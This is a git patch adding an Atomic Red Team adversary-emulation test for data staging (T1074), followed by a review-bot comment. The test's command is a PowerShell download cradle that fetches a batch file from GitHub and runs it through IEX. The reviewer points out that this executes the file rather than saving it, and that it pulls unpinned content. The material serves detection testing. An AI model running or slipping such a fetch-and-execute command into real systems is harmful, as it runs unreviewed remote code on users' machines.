From aa0dfa080011748e08ef8dca2ccf059255f91305 Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Thu, 24 May 2018 00:39:59 -0400
Subject: [PATCH] Add test for T1074, Data Staged Data Staged Yaml
---
atomics/T1074/T1074.yaml | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
create mode 100644 atomics/T1074/T1074.yaml
diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
new file mode 100644
index 00000000..7b081537
--- /dev/null
+++ b/atomics/T1074/T1074.yaml
@@ -0,0 +1,16 @@
+---
+attack_technique: T1074
+display_name: Data Staged
+
+atomic_tests:
+- name: Stage data from Discovery.bat
+ description: |
+ Utilize powershell to download discovery.bat and save to a local file
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: powershell
+ command: |
+ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > c:\windows\pi.log
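Review bot: The `command` on the last line of the hunk passes the downloaded text to `IEX`, so the test executes whatever is served at that URL instead of staging it; that does not match the description ("download discovery.bat and save to a local file"), and `c:\windows\pi.log` ends up holding the output of that execution rather than the file. Because the URL tracks `master`, every run also evaluates content nobody reviewed at the time the test was written; saving without executing and pinning the ref would address both, for example `(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/<COMMIT_SHA>/Windows/Payloads/Discovery.bat', "$env:TEMP\discovery.bat")`. Writing under `c:\windows` presumably requires an elevated session, which the test does not state, and the definition has no cleanup step for the file it leaves behind.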